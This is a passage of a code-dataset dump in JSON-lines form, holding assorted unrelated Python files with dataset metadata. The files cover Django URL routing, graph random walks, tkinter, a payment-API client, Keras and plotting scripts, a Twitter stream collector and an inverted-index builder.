'validacion': metodo.typo_vpos,\n 'razon': cedula,\n 'monto': amount\n\n })\n else:\n info_data.append({\n 'validacion': 'False',\n })\n return info_data","sub_path":"3mit_precioaux_pos/models/funcion_call.py","file_name":"funcion_call.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"601856378","text":"from django.conf.urls.defaults import patterns, include, url\r\n#from django.contrib.staticfiles.urls import staticfiles_urlpatterns\r\n#from django.conf import settings\r\n\r\n\r\n# Uncomment the next two lines to enable the admin:\r\n# from django.contrib import admin\r\n# admin.autodiscover()\r\n\r\nurlpatterns = patterns('',\r\n # Examples:\r\n # url(r'^$', 'WWWDB.views.home', name='home'),\r\n # url(r'^WWWDB/', include('WWWDB.foo.urls')),\r\n\r\n # Uncomment the admin/doc line below to enable admin documentation:\r\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\r\n\r\n # Uncomment the next line to enable the admin:\r\n # url(r'^admin/', include(admin.site.urls)),\r\n \r\n url(r'^import/?', include('ImportLabData.urls')),\r\n url(r'^forms/', include('WebForms.urls')),\r\n url(r'^accounts/', include('Accounts.urls')),\r\n url(r'^export/', include('Export.urls')),\r\n #url(r'^static/(?P.*)$', 'django.views.static.serve', {\r\n #'document_root': settings.MEDIA_ROOT,\r\n #}),\r\n #url(r'^admin/', include(admin.site.urls)),\r\n)\r\n\r\n#urlpatterns += staticfiles_urlpatterns()\r\n","sub_path":"WWWDB/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"373534103","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 10 19:05:22 2020\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport random\r\nimport networkx as nx\r\nfrom collections import Counter\r\n\r\n# a Graph class that implements the walk functionality\r\nclass Graph:\r\n \r\n def __init__(self, data):\r\n self.G = self.load_data(data)\r\n self.mid_freq = self.freq(data)\r\n self.get_graph_info()\r\n \r\n \r\n def load_data(self,data):\r\n G = nx.DiGraph()\r\n for index in range(len(data)):\r\n for i in range(len(data[index][1])-1):\r\n l_node = data[index][1][i]\r\n r_node = data[index][1][i+1]\r\n if (l_node, r_node) in G.edges():\r\n G.add_edge(l_node, r_node, weight=G[l_node][r_node]['weight']+1)\r\n else:\r\n G.add_edge(l_node, r_node, weight=1)\r\n return G\r\n \r\n \r\n def freq(self,data):\r\n mid_freq = Counter()\r\n for i in range(len(data)):\r\n mid_freq.update(data[i][1])\r\n return mid_freq\r\n \r\n \r\n def get_graph_info(self):\r\n #nx.draw(G,with_labels=True)\r\n print('number of edges:', len(self.G.edges()))\r\n s = 0\r\n for u,v,d in self.G.edges(data = 'weight'):\r\n if d>1:\r\n s+=1\r\n print('number of edges with weight greater than 1:',s)\r\n print('number of edges:', len(self.G.edges()))\r\n print('number of nodes:', len(self.G.nodes()))\r\n #print(nx.adjacency_matrix(self.G))\r\n \r\n \r\n # weighted deep walk\r\n def random_walk(self, path_length, start=None):\r\n \"\"\" Returns a truncated random walk.\r\n path_length: Length of the random walk.\r\n start: the start node of the random walk.\r\n \"\"\"\r\n if start:\r\n path = [start]\r\n else:\r\n # starts from a random node if start is not defined\r\n path = [random.choice(list(self.G.nodes()))]\r\n \r\n while len(path) < path_length:\r\n neighbor_dict = self.G[str(path[-1])]\r\n if len(neighbor_dict.keys())!=0: # start walking when there are neighboring nodes\r\n walk_list = [] # save every neighbor into one list according to its weight, then randomly choose a node as the next step of the walk\r\n for node,weight in neighbor_dict.items():\r\n for i in range(weight['weight']):\r\n walk_list.append(node)\r\n path.append(random.choice(walk_list)) # weighted walk\r\n else: # exit directly when there are no neighbors\r\n break \r\n return path \r\n \r\n \r\n # node2vec walk\r\n def node2vec_walk(self, path_length, start=None):\r\n pass\r\n\r\n \r\n # num_paths: how many walks start from each node\r\n # path_length: the length of each walk\r\n def build_deepwalk_corpus(self, num_paths, path_length):\r\n \"\"\" Returns a corpus(list) from deep walk.\r\n num_paths: number of path every node walks\r\n path_length: maximum length of a path \r\n \"\"\"\r\n walks = []\r\n nodes = list(self.G.nodes())\r\n \r\n for cnt in range(num_paths):\r\n random.shuffle(nodes)\r\n for node in nodes:\r\n walks.append(self.random_walk(path_length, start=node))\r\n \r\n return walks\r\n\r\n ","sub_path":"deep_walk.py","file_name":"deep_walk.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"79415866","text":"from tkinter import *\n\nroot = Tk()\n\nphoto = PhotoImage(file='imgs/bg.png')\ntheLabel = Label(root,\n text='學習 Pytho 真好玩',\n justify=LEFT,\n image=photo,\n compound=CENTER,\n font=('標楷體', 20),\n fg='blue')\ntheLabel.pack()\n\nmainloop()\n","sub_path":"tkinter/tk4.py","file_name":"tk4.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"17920948","text":"from .mixins import AllMixin, CreateMixin, DeleteMixin, RetrieveMixin, UpdateMixin\n\n\nclass Resource:\n def __init__(self, base_api):\n self._base_api = base_api\n\n\nclass CustomerResource(AllMixin, CreateMixin, DeleteMixin, RetrieveMixin, UpdateMixin, Resource):\n _endpoint = 'customers'\n\n\nclass EventResource(AllMixin, RetrieveMixin, Resource):\n _endpoint = 'events'\n\n\nclass TransactionResource(AllMixin, CreateMixin, DeleteMixin, RetrieveMixin, Resource):\n _endpoint = 'transactions'\n\n def pay(self, object_id, **kwargs):\n params = kwargs.get('params', {})\n params['id'] = object_id\n kwargs['params'] = params\n return self._base_api.get(f'{self._endpoint}/pay', **kwargs)\n\n\nclass UserResource(AllMixin, UpdateMixin, DeleteMixin, Resource):\n _endpoint = 'accounts/users'\n\n\nclass AccountResource(AllMixin, CreateMixin, UpdateMixin, DeleteMixin, Resource):\n _endpoint = 'accounts'\n\n def current(self, object_id, **kwargs):\n return self._base_api.put(f'{self._endpoint}/current/{object_id}', data=None, **kwargs)\n\n\nclass SettingsResource(AllMixin, Resource):\n _endpoint = 'settings'\n\n\nclass AccountSettingsResource(AllMixin, CreateMixin, Resource):\n _endpoint = 'account_settings'\n\n\nclass RoleResource(AllMixin, Resource):\n _endpoint = 'roles'\n\n\nclass LogResource(AllMixin, RetrieveMixin, Resource):\n _endpoint = 'logs'\n\n\nclass PayoutResource(CreateMixin, RetrieveMixin, Resource):\n _endpoint = 'payouts'\n\n def schedule(self, data, **kwargs):\n return self._base_api.post(f'{self._endpoint}/start', data, **kwargs)\n","sub_path":"fedapay/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"132986382","text":"import sys\nsys.path.append(\"/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages\")\nimport pickle\nimport numpy as np\nimport networkx as nx\nfrom time import time\nfrom scipy.sparse import coo_matrix, identity\n\n\nMAX_GRAPH_DISTANCE_RATIO = 1 / 3\nTOPK_LIST = [1, 2, 5, 10, 20, 50, 100]\n\n\ndef build_graph(path):\n print('building KG...')\n kg = nx.DiGraph()\n for line in open(path, 'r'):\n h, r, t = line.strip().split('\\t')\n kg.add_edge(int(h), int(t), edge_type=int(r))\n return kg\n\n\ndef get_dicts(kg):\n print('calculating dicts...')\n\n node2neighbor_num = dict()\n node2degree = dict()\n node2neighbor_edge_num = dict()\n\n for node in kg.nodes:\n neighbors = set(kg.predecessors(node)) | set(kg.successors(node))\n n_neighbors = len(neighbors)\n node2neighbor_num[node] = n_neighbors\n\n degree = kg.degree(node)\n node2degree[node] = degree\n\n subgraph = kg.subgraph(neighbors)\n n_neighbor_edges = len(subgraph.edges)\n node2neighbor_edge_num[node] = n_neighbor_edges\n\n return node2neighbor_num, node2degree, node2neighbor_edge_num\n\n\ndef construct_local_subgraph(query_node, kg):\n subgraph = kg.subgraph(set(kg.predecessors(query_node)) | set(kg.successors(query_node)) | {query_node})\n\n # the center node (query node) is always mapped to 0 in the relabeled query graph\n node_mapping = {query_node: 0}\n for n in subgraph.nodes:\n if n != query_node:\n node_mapping[n] = len(node_mapping)\n\n subgraph_relabeled = nx.DiGraph()\n for e in subgraph.edges:\n subgraph_relabeled.add_edge(node_mapping[e[0]],\n node_mapping[e[1]],\n edge_type=subgraph.get_edge_data(e[0], e[1])['edge_type'])\n\n return subgraph_relabeled\n\n\ndef calculate_assignment_matrix(query_graph, kg):\n A = get_affinity_matrix(query_graph, kg)\n x = np.ones([A.shape[0], 1], dtype=np.float) / A.shape[0]\n while True:\n next_x = A.dot(x)\n next_x /= np.linalg.norm(next_x)\n if np.linalg.norm(next_x - x) < 0.01:\n break\n x = next_x\n\n x = x.reshape([len(query_graph.nodes), len(kg.nodes)])\n return x\n\n\n# A_{ia; jb} = s_E(e_{ij}, e'_{ab})\ndef get_affinity_matrix(query_graph, kg):\n n = len(query_graph.nodes)\n m = len(kg.nodes)\n\n row = []\n col = []\n data = []\n for query_edge in query_graph.edges:\n for kg_edge in kg.edges:\n i = query_edge[0]\n j = query_edge[1]\n a = kg_edge[0]\n b = kg_edge[1]\n ia = i * m + a\n jb = j * m + b\n e_ij = query_graph.get_edge_data(i, j)['edge_type']\n e_ab = kg.get_edge_data(a, b)['edge_type']\n if e_ij == e_ab:\n row.append(ia)\n col.append(jb)\n data.append(1)\n\n A = coo_matrix((data, (row, col)), shape=(n * m, n * m))\n A += identity(n * m)\n\n return A\n\n\ndef main():\n kg = build_graph('triplets.txt')\n ground_truth = pickle.load(open('ground_truth.pkl', 'rb'))\n node2neighbor_num, node2degree, node2neighbor_edge_num = get_dicts(kg)\n\n precision_list = []\n recall_list = []\n\n for i, q in enumerate(ground_truth.keys()):\n print('%d / %d' % (i, len(ground_truth)))\n\n query_graph = construct_local_subgraph(q, kg)\n x = calculate_assignment_matrix(query_graph, kg)\n\n scores = dict()\n for n in range(len(kg.nodes)):\n if n == q:\n continue\n if node2neighbor_num[n] != node2neighbor_num[q]:\n continue\n if abs(node2degree[n] - node2degree[q]) + abs(node2neighbor_edge_num[n] - node2neighbor_edge_num[q]) \\\n > MAX_GRAPH_DISTANCE_RATIO * len(query_graph.edges):\n continue\n scores[n] = x[0][n]\n sorted_res = [i[0] for i in sorted(scores.items(), key=lambda item: -item[1])]\n\n precision = []\n recall = []\n for k in TOPK_LIST:\n n_hit = len(set(sorted_res[0:k]) & set(ground_truth[q]))\n precision.append(n_hit / k)\n recall.append(n_hit / len(ground_truth[q]))\n\n precision_list.append(precision)\n recall_list.append(recall)\n\n avg_precision = np.average(np.array(precision_list), axis=0)\n avg_recall = np.average(np.array(recall_list), axis=0)\n\n np.set_printoptions(precision=3)\n print('\\nk =', TOPK_LIST)\n print('precision@k:', avg_precision)\n print('recall@k:', avg_recall)\n\n\nif __name__ == '__main__':\n t = time()\n main()\n print('time: %.1f s' % (time() - t))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"295566438","text":"\n\nfrom xai.brain.wordbase.verbs._shim import _SHIM\n\n#calss header\nclass _SHIMS(_SHIM, ):\n\tdef __init__(self,): \n\t\t_SHIM.__init__(self)\n\t\tself.name = \"SHIMS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"shim\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_shims.py","file_name":"_shims.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
2018\n\n@author: gbaechle\n\"\"\"\n\nimport numpy as np\nimport scipy as sp\nimport scipy.stats\nfrom scipy.special import erfc\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom scipy.optimize import least_squares\n\nimport seabornstyle as snsty\n\nimport sys\nsys.path.append(\"../\")\nfrom lippmann import *\n#from finite_depth_analysis import *\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n\nplt.close('all')\nfig_path = 'PNAS/'\n\n\ndef plot_pipeline(N=500):\n \n Z = 5E-6\n r = 0.8\n t = 0.\n \n lambdas, omegas = generate_wavelengths(N) #3000\n depths = np.linspace(0,Z*(1-1/N),N)\n # depths = generate_depths(max_depth=5E-6)\n omegas = 2 * np.pi * c / lambdas \n \n spectrum = generate_gaussian_spectrum(lambdas=lambdas, mu=530E-9, sigma=20E-9) + generate_gaussian_spectrum(lambdas=lambdas, mu=460E-9, sigma=40E-9) + 0.7*generate_gaussian_spectrum(lambdas=lambdas, mu=650E-9, sigma=55E-9) \n spectrum = generate_mono_spectrum(lambdas=lambdas, color=530E-9) \n lippmann_complex = lippmann_transform_complex(lambdas, spectrum, depths, r=r, t=t)\n lippmann_no_window = lippmann_transform(lambdas, spectrum, depths, r=r)[0] \n \n window = (np.cos(np.linspace(0, np.pi, len(depths)))+1)/2\n# window = np.linspace(1,0, len(depths))\n# window = np.exp(np.linspace(0, -7, len(depths)))\n window = erfc(np.linspace(0,0.5,len(depths))) \n# window = np.ones(len(depths))\n lippmann = lippmann_no_window*window\n \n spectrum_reconstructed_complex = inverse_lippmann(lippmann, lambdas, depths, return_intensity=False)\n spectrum_reconstructed = np.abs(spectrum_reconstructed_complex)**2\n \n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_spectrum(lambdas, spectrum, ax=plt.gca()) \n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'original.pdf')\n plt.title('original spectrum') \n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_lippmann_transform(depths, lippmann_complex, ax=plt.gca(), complex_valued=True)\n plt.gca().axhline(y=0, color='k', zorder=-10, lw=0.5)\n plt.savefig(fig_path + 'lippmann_complex.pdf')\n plt.title('Lippmann transform (complex)') \n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_lippmann_transform(depths, lippmann_no_window, ax=plt.gca()) \n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'plate_density.pdf')\n plt.title('Lippmann transform')\n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_lippmann_transform(depths, lippmann, ax=plt.gca()) \n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'plate_density_windowed.pdf')\n plt.title('Lippmann transform windowed')\n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_spectrum(lambdas, np.real(spectrum_reconstructed_complex), ax=plt.gca())\n plt.gca().plot(lambdas*1E9, np.imag(spectrum_reconstructed_complex), c='0.7', zorder=-2)\n plt.gca().set_ylim(-1.1*np.max(np.abs(spectrum_reconstructed_complex)), 1.1*np.max(np.abs(spectrum_reconstructed_complex)))\n plt.gca().axhline(y=0, color='k', zorder=-10, lw=0.5)\n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'replay_complex.pdf')\n plt.title('spectrum replayed (complex)') \n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_spectrum(lambdas, spectrum_reconstructed, ax=plt.gca()) \n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'replay.pdf')\n plt.title('spectrum replayed') \n \n f, axes = plt.subplots(1, 5, figsize=(3.45/0.5*1.4, 3.45/4.6/0.5*1.4))\n show_spectrum(lambdas, spectrum, ax=axes[0], short_display=True)\n axes[0].set_yticks([0])\n# axes[0].set_xticklabels([400, '$\\lambda~(nm)$', 700])\n show_lippmann_transform(depths, lippmann_no_window, ax=axes[1], 
short_display=True)\n axes[1].axhline(y=0, color='k', zorder=-10, lw=0.5)\n show_lippmann_transform(depths, lippmann, ax=axes[2], short_display=True)\n axes[2].axhline(y=0, color='k', zorder=-10, lw=0.5)\n show_spectrum(lambdas, np.real(spectrum_reconstructed_complex), ax=axes[3], short_display=True)\n axes[3].plot(lambdas*1E9, np.imag(spectrum_reconstructed_complex), c='0.7', zorder=-2)\n axes[3].set_ylim(-1.1*np.max(np.abs(spectrum_reconstructed_complex)), 1.1*np.max(np.abs(spectrum_reconstructed_complex)))\n axes[3].axhline(y=0, color='k', zorder=-10, lw=0.5)\n axes[3].set_yticks([0])\n# axes[3].set_xticklabels([400, '$\\lambda~(nm)$', 700])\n show_spectrum(lambdas, spectrum_reconstructed, ax=axes[4], short_display=True) \n axes[4].set_yticks([0])\n# axes[4].set_xticklabels([400, '$\\lambda~(nm)$', 700])\n \n axes[0].set_title('(a) Original spectrum')\n axes[1].set_title('(b) Intensity of interferences')\n axes[2].set_title('(c) Silver density')\n axes[3].set_title('(d) Complex wavefunction')\n axes[4].set_title('(e) Replayed intensity')\n plt.savefig(fig_path + 'pipeline.pdf')\n \n \n \ndef plot_sinewaves(N=500, periods=3):\n \n t = np.linspace(0,2*periods*np.pi,N)\n t2 = np.linspace(0,2*periods*np.pi,10*N)\n wave = np.sin(t)\n \n plt.figure(figsize=(10,2))\n plt.plot(t, wave, color='#4FAADF')\n plt.ylim([-1.2, 1.2])\n plt.savefig('scalar_field.pdf')\n \n plt.figure(figsize=(10, 2))\n stem_with_color(t, wave-0.05, plt.gca(), color='#4FAADF', pos=True)\n stem_with_color(t, wave+0.05, plt.gca(), color='#4FAADF', pos=False)\n plt.plot(t2, np.sin(t2), color='k') \n plt.ylim([-1.2, 1.2])\n plt.savefig('vector_field.pdf')\n\ndef stem_with_color(x, y, ax, color, pos=True):\n \n if pos:\n marker = '^'\n x_ = x[y >= 0]\n y_ = y[y >= 0]\n else:\n marker = 'v'\n x_ = x[y < 0]\n y_ = y[y < 0]\n \n (markerline, stemlines, baseline) = plt.stem(x_, y_, markerfmt=marker)\n plt.setp(baseline, visible=False)\n plt.setp(markerline, color=color)\n plt.setp(stemlines, color=color)\n \ndef plot_interferences(N=2000):\n \n L = 200\n X, Y = np.meshgrid(np.linspace(0, L, N), np.linspace(-L/2, L/2, N))\n \n x1, y1 = 0, L/4\n x2, y2 = 0, -L/4\n patterns = np.sin(np.sqrt((X-x1)**2 + (Y-y1)**2)) + np.sin(np.sqrt((X-x2)**2 + (Y-y2)**2))\n \n patterns = np.c_[np.sin(X[:,:N//4])[::-1, :], patterns]\n \n plt.figure(figsize=(10, 5))\n plt.imshow(patterns, cmap=plt.cm.Blues_r)\n plt.axis('off')\n plt.savefig('patterns.pdf')\n \n plt.figure(figsize=(5, 5))\n plt.imshow(patterns[:, -1].reshape(-1,1), cmap=plt.cm.Blues_r, aspect=1/200)\n plt.axis('off')\n plt.savefig('screen.pdf')\n \n \ndef plot_filter(N=1000, Z=5E-6):\n c = 299792458/1.5\n lambdas, omegas = generate_wavelengths(N=N, c=c)\n\n #plot filter\n plt.figure(figsize=(3.45*1.4, 1.7*1.4))\n# plt.figure()\n fda.plot_h( lambdas, fda.s_z_tilde(Z, 2*np.pi*c/550E-9 -omegas), ax=plt.gca() )\n plt.savefig(fig_path + 's_z_tilde.pdf') \n \n\n \n \nif __name__ == '__main__':\n \n plot_pipeline()\n# plot_sinewaves(N=60)\n# plot_interferences()\n# plot_filter()\n \n \n","sub_path":"pnas.py","file_name":"pnas.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"471212925","text":"import numpy as np\nfrom numba import jit, prange\n\nresult = np.zeros(2000)\nresult2 = np.zeros(2000)\na = (2048, 2048)\nvalues = np.random.random(a)\nxy = np.random.randint(0, 2000, a)\n\n\ndef run():\n for i in np.unique(xy):\n result2[i] = np.max(values[xy == i])\n\n#@jit(nopython=True, 
parallel=True)\ndef inner(result, vfs, h):\n i = 0\n for j in prange(len(h)):\n k = h[j]\n result[j] = np.max(vfs[i:i+k])\n i += k\n\n\n#@jit(nopython=True, nogil=True)\ndef run_sort(xy, result, values):\n xf = xy.flatten()\n vf = values.flatten()\n idx = xf.argsort()\n \n vfs = vf[idx]\n\n h = np.bincount(xf)\n inner(result, vfs, h)\n\n","sub_path":"examples/hist_test.py","file_name":"hist_test.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"380136611","text":"import numpy as np\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense ,Activation,Masking,LSTM,Dropout\nfrom keras.optimizers import Adam\nfrom keras.preprocessing import sequence\nimport matplotlib.pyplot as plt\n\n#数据处理\n# x_shape(50,10x100),y_shape(2)\nX_data_path = '/home/cao/github_repository/LSTM+GAN/data/train/x_train.txt'\nY_data_path = '/home/cao/github_repository/LSTM+GAN/data/train/y_train.txt'\n#读取文件数据\ntemp_x = []\n# s_len = 0\ndef get_batch_data(file_path):\n\n fr = open(file_path,'r')\n num_lines = fr.readlines()\n # s_len = len(num_lines[0])\n fr.close()\n fw = open(file_path,'w')\n for eachlines in num_lines:\n fw.writelines(eachlines)\n temp_x.append(eachlines.split(' '))\n fw.close()\n return temp_x ,len(num_lines) # ,s_len\n\nx_train ,num_l = get_batch_data(X_data_path)\n\ntemp_y = []\ndef y_label(file):\n fr = open(file,'r')\n label = fr.readlines()\n fr.close()\n fw = open(file,'w')\n for c in label:\n fw.writelines(c)\n temp_y.append(c)\n fw.close()\n return temp_y\n\ny_train = y_label(Y_data_path)\n\n#数据处理成定长,补充value = -1\nx_train = sequence.pad_sequences(x_train,maxlen = 100,padding = 'post',value=-1)\n\n#取0.9%为训练数据,另外的为测试数据\nnum = int(0.9*num_l)\nx_train = np.array(x_train).astype(float)\ny_train = np.array(y_train).astype(float)\nx_train = np.reshape(x_train,(x_train.shape[0],x_train.shape[1],1))\nx_test = x_train[num:]\ny_test = y_train[num:]\nx_train = x_train[:num]\ny_train = y_train[:num]\ny_train = np_utils.to_categorical(y_train,num_classes =2)\ny_test = np_utils.to_categorical(y_test,num_classes = 2)\n\nprint(' num_l: ',num_l,'\\n','num: ',num ,'\\n','x_train:\\n ',x_train,'\\n','y_train:\\n ', y_train,'\\n','x_test',x_test,'\\n','y_test: ',y_test)\nprint(' x_train type:',type(x_train),'shape:',x_train.shape,'\\n','y_train type:',type(y_train),'shape:',y_train.shape)\n\n#搭建网络\nbatch_index = 0\ntime_step = len(x_train[0]) #100\ninput_dim =1 #每个词的维度\ninput_length = len(x_train) #10\noutput_size = 2\ncell_size = 32 #hidden_unit数量\nbatch_size = 9 #每批次训练多少条数据\nlr = 0.006\nepochs = 6\nhidenfeatrue = 32\n\nmodel = Sequential()\nmodel.add(Masking(mask_value= -1,input_shape=(time_step ,input_dim))) #model.add(Masking(mask_value=0., input_shape=(timesteps, features)))\n#build a LSTm RNN\nmodel.add(LSTM(\n batch_input_shape=(None,x_train.shape[1], x_train.shape[2]),\n output_dim=cell_size,\n return_sequences = False))\n\n# model.add(LSTM(hidenfeatrue, input_shape=(time_step, input_length)))\nmodel.add(Dropout(0.5))\n\n#add output layer\nmodel.add(Dense(output_size))\nmodel.add(Activation('softmax'))\n\n#优化\nadam = Adam(lr)\n\n#add metric to get more results you want to see\nmodel.compile(\n optimizer=adam,\n loss='binary_crossentropy',\n metrics=['accuracy'],\n)\nprint('\\n Training --------------')\nmodel.summary()\nhistory = model.fit(x_train, y_train, epochs=epochs, batch_size=batch_size,validation_data=(x_test,y_test))\nnp.savetxt('train_loss.txt', 
history.history['loss'])\nnp.savetxt('train_acc.txt', history.history['acc'])\n\nplt.plot(np.loadtxt('train_loss.txt'), color='blue', label='train_loss')\nplt.plot(np.loadtxt('train_acc.txt'), color='green', label='train_acc')\nplt.legend(loc='best')\nplt.show()\nprint('\\n Test ------------------')\nfor step in range(100):\n if step % 20 == 0:\n loss, accuracy = model.evaluate(x_test, y_test)\n\n print('test_loss: ', loss)\n print('accuracy: ', accuracy)\n","sub_path":"kears_classifier.py","file_name":"kears_classifier.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"640319173","text":"from typing import Type, Union\n\nfrom .constants import PREFIX_SEP\nfrom .meta_base import ColMeta\nfrom .util import camel_to_snake\n\n\nclass ColAccessor(metaclass=ColMeta):\n \"\"\"describe and access raw columns\n\n useful for\n - getting column names from static analysis\n - documenting types\n - DRY describing nested structures\n\n e.g.\n\n class LocationCols(ColAccessor):\n lon = float\n lat = float\n\n class TableCols(ColAccessor):\n col1 = int\n col2 = str\n foreign_key1 = \"name_of_key\"\n\n class NestedCols(ColAccessor):\n s = str\n x = float\n\n start_loc = LocationCols\n end_loc = LocationCols\n\n >>> TableCols.start_loc.lat\n 'start_loc__lat'\n\n \"\"\"\n\n\nclass ColAssigner(ColAccessor):\n \"\"\"define functions that create columns in a dataframe\n\n later the class attributes can be used to access the column\n can be used to create nested structures of columns\n\n either by assigning or inheriting within:\n\n class MyStaticChildAssigner(ColAssigner):\n\n pass\n\n class MyAssigner(ColAssigner):\n\n class MySubAssigner(ColAssigner):\n pass\n\n chass1 = MyStaticChildAssigner\n \"\"\"\n\n def __call__(self, df, carried_prefixes=()):\n # dir() is alphabetised; object.__dir__ is not\n # important here if assigned cols rely on each other\n for attid in self.__dir__():\n if attid.startswith(\"_\"):\n continue\n att = getattr(self, attid)\n new_pref_arr = (*carried_prefixes, camel_to_snake(attid))\n if isinstance(att, ColMeta):\n if ChildColAssigner in att.mro():\n inst = att(df, self)\n else:\n inst = att()\n df = inst(df, carried_prefixes=new_pref_arr)\n elif callable(att):\n colname = PREFIX_SEP.join(new_pref_arr)\n df = df.assign(**{colname: self._call_att(att, df)})\n return df\n\n @staticmethod\n def _call_att(att, df):\n return att(df)\n\n\nclass ChildColAssigner(ColAssigner):\n \"\"\"assigner specifically for nested structures\n\n methods of these are not called with parameters\n\n the dataframe and the parent assigner are passed\n to the __init__ method as parameters\n \"\"\"\n\n def __init__(self, df, parent_assigner: ColAssigner) -> None:\n pass\n\n @staticmethod\n def _call_att(att, _):\n return att()\n\n\ndef get_all_cols(cls: Union[Type[ColAccessor], Type[ColAssigner]]):\n \"\"\"returns a list of strings of all columns given by the type\n\n can also be used for nested structures of columns\n \"\"\"\n out = []\n for attid in dir(cls):\n if attid.startswith(\"_\"):\n continue\n attval = getattr(cls, attid)\n if isinstance(attval, type) and any(\n [kls in attval.mro() for kls in [ColAccessor, ColAssigner]]\n ):\n out += get_all_cols(attval)\n continue\n if ColAccessor in cls.mro():\n out.append(attval)\n return out\n\n\ndef get_att_value(accessor: Type[ColAccessor], attname: str):\n \"\"\"get the true assigned value for the class attribute\"\"\"\n return 
accessor.__getcoltype__(attname)\n","sub_path":"colassigner/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"32392341","text":"import tweepy\nimport json\nfrom oauth import *\nfrom mongo_config import *\nfrom pymongo import MongoClient\n \n\n #This module is just for querying all the json that the standard twitter API returns to me.\n \n \ntags=['#openbanking','#apifirst','#devops','#cloudfirst','#microservices','#apigateway','#oauth', '#swagger','#raml','#openapis']\n\nclass StreamListener(tweepy.StreamListener): \n #This is a class provided by tweepy to access the Twitter Streaming API. \n \n def on_connect(self):\n # Called initially to connect to the Streaming API\n print(\"You are now connected to the streaming API.\")\n \n def on_error(self, status_code):\n # On error - if an error occurs, display the error / status code\n print('An Error has occurred: ' + repr(status_code))\n return False\n \n def on_data(self, data):\n #This is the meat of the script...it connects to your mongoDB and stores the tweet\n try:\n \n # Decode the JSON from Twitter\n datajson = json.loads(data)\n \n #grab the 'created_at' data from the Tweet to use for display\n created_at = datajson['created_at']\n \n #print out a message to the screen that we have collected a tweet\n print(\"Tweet collected at \" + str(created_at))\n \n #insert the data into the mongoDB into a collection called twitter_search\n #if twitter_search doesn't exist, it will be created.\n db.twitter_search.insert(datajson)\n except Exception as e:\n print(e)\n \n\nlistener = StreamListener(api=tweepy.API(wait_on_rate_limit=True)) \nstreamer = tweepy.Stream(auth=auth, listener=listener)\nprint(\"Tracking: \" + str(tags))\nstreamer.filter(track=tags)","sub_path":"test/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"201464391","text":"def solution(A):\n \"\"\"\n Problem Statement: https://app.codility.com/programmers/lessons/2-arrays/odd_occurrences_in_array/\n \"\"\"\n result = 0\n for number in A:\n result ^= number\n return result\n\n\nif __name__ == '__main__':\n assert solution([9, 3, 9, 3, 9, 7, 9]) == 7\n assert solution([1]) == 1\n","sub_path":"codility/arrays/odd_occurrences_in_array.py","file_name":"odd_occurrences_in_array.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"104785948","text":"\"\"\"\nBuild dictionary for Inverted Index, store in Memory\nAuthor:Bo\n\"\"\"\nfrom __init__ import *\n\nclass Dictionary:\n def __init__(self):\n self.fw = FileWriter()\n self.fr = FileReader()\n self.punc = string.punctuation\n\n def get_terms(self):\n \"\"\"Get questions one by one, generate (termID, docID, termFrequency) dictionary for each question\n \"\"\"\n with Conn(database = conf.DB_NAME, host=conf.IP, port=conf.PORT, collection=conf.COL_NAME) as col:\n cursor = col.find()\n doc_json = []\n for doc in cursor:\n #current question\n doc_terms = []\n doc_id = str(doc['_id'])\n doc_tit = doc['question']['title'][0].split()\n doc_des = []\n if doc['question'].get('description'):\n doc_des = doc['question']['description'][0].split()\n doc_tag = doc['question']['tags']\n # lowercase, drop digits and strip punctuation\n doc_tit = self.clean(doc_tit)\n doc_des = self.clean(doc_des)\n if 